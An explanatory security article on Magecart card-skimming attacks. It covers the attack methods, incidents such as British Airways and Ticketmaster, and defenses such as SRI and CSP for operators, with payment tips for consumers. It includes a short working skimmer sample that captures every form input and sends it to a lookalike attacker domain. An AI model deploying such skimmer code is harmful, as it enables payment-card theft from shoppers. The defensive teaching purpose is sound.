When you enter your credit card details on a shopping website, you assume that information goes directly to the payment processor. Magecart attacks prove that assumption wrong. Since at least 2016, criminal groups operating under the loose “Magecart” label have infected thousands of e-commerce websites with malicious JavaScript that silently copies payment card data the moment a user types it — before the form is even submitted.
What Is a Magecart Attack?
Magecart is not a single group but a collection of cybercriminal groups — at least a dozen distinct threat actors — all using the same core technique: digital card skimming. They inject malicious JavaScript into e-commerce checkout pages. When a shopper fills in their name, card number, expiration date, and CVV, the skimmer captures every keystroke and transmits the data to an attacker-controlled server.
The name comes from Magento, the popular e-commerce platform that was the original primary target. Today, attacks target WooCommerce, Shopify (through third-party scripts), BigCommerce, and custom-built checkout systems.
How the Attacks Work
Direct compromise: Attackers exploit vulnerabilities in the e-commerce platform itself (unpatched Magento, outdated plugins) to gain server access and inject malicious code into checkout pages. The script often disguises itself as a Google Analytics tracker or Stripe payment helper.
Supply chain attack: More sophisticated Magecart groups don’t attack the store directly — they compromise the third-party JavaScript libraries the store loads. A retailer might use a chat widget, analytics service, or A/B testing tool that loads an external JavaScript file. If attackers compromise that third-party provider’s CDN or code repository, every site that loads their script becomes a victim simultaneously.
The 2018 British Airways breach — which exposed 500,000 customers’ payment data — used this exact technique. Attackers modified a third-party Modernizr script that British Airways loaded from its own infrastructure after first compromising the airline’s build system.
The skimmer payload:
A simplified version of what a Magecart skimmer looks like:
// Disguised as legitimate analytics
(function() {
var _0x = function() {
document.querySelectorAll('input').forEach(function(el) {
el.addEventListener('input', function() {
var data = {
field: el.name,
value: el.value,
url: window.location.href
};
// Exfiltrate to attacker server
navigator.sendBeacon('https://google-analytics.pw/collect',
JSON.stringify(data));
});
});
};
window.addEventListener('load', _0x);
})();Real skimmers are heavily obfuscated, often appearing as strings of hex or base64-encoded characters to evade detection.
Notable Magecart Incidents
British Airways (2018): 500,000 customer records. Attacker modified 22 lines of JavaScript on the booking page. GDPR fine: £20 million.
Ticketmaster (2018): 40,000 customers affected. Compromised Inbenta Technologies’ customer support chat script that Ticketmaster embedded.
Newegg (2018): 13 days of skimming activity. Attackers registered the lookalike domain neweggstats.com to receive stolen data.
Macy’s (2019): Malicious script on the Macy’s checkout and wallet page collected card information for one week.
Claire’s (2020): Skimmer active for over two months. Also hit Intersport at the same time, indicating a coordinated campaign.
These are only the disclosed incidents. Security researchers estimate thousands of smaller e-commerce sites are actively skimmed at any given time, with victims often unaware for months.
Detection and Defense for Website Operators
Subresource Integrity (SRI): For any third-party JavaScript you load, add an integrity attribute with a cryptographic hash of the expected file:
<script src="https://cdn.example.com/analytics.js"
integrity="sha384-oqVuAfXRKap7fdgcCY5uykM6+R9GqQ8K/ux..."
crossorigin="anonymous">
</script>If the file is modified at the CDN, the hash won’t match and the browser will refuse to load it.
Content Security Policy (CSP): A strict CSP header prevents scripts from loading from unauthorized domains and blocks data exfiltration to unknown URLs:
Content-Security-Policy: default-src 'self';
script-src 'self' https://trusted-cdn.com;
connect-src 'self' https://api.stripe.com;Regular file integrity monitoring: Tools like AIDE (Linux) or commercial solutions alert you when JavaScript files on your server change unexpectedly.
Third-party script auditing: Regularly audit every external JavaScript resource your checkout page loads. Question whether each one is necessary, and favor self-hosting critical scripts over CDN loading.
Protecting Yourself as a Consumer
You cannot detect a Magecart skimmer as a shopper — the checkout page looks identical to a clean one. But you can limit your exposure:
Use virtual card numbers. Services like Privacy.com (US), Revolut (EU/UK), and many major banks’ virtual card features generate one-time or merchant-locked card numbers. Even if a skimmer captures the number, it’s useless after a single transaction.
Pay via PayPal, Apple Pay, or Google Pay. These payment methods don’t expose your real card number to the merchant’s JavaScript at all. The number stays in a tokenized system.
Monitor your statements. Magecart theft is often tested with small transactions ($1–$5) before a larger fraud attempt. Alert on any unfamiliar transaction.
Use separate cards for online shopping. If your designated online shopping card is skimmed, only that card is compromised — not your primary debit or credit card.
Prefer checkout-page isolation. Sites that redirect you to a payment processor’s hosted page (Stripe Checkout, Braintree’s hosted fields, PayPal) are safer than those with inline checkout forms where skimmers operate.
The Bigger Picture
Magecart attacks highlight the fundamental security problem with the modern web: every third-party script a site loads is implicitly trusted to execute code in the user’s browser with the same privileges as the site itself. Until websites universally adopt strict CSPs, SRI, and thorough third-party audits, digital skimming remains one of the most profitable and difficult-to-detect forms of payment fraud.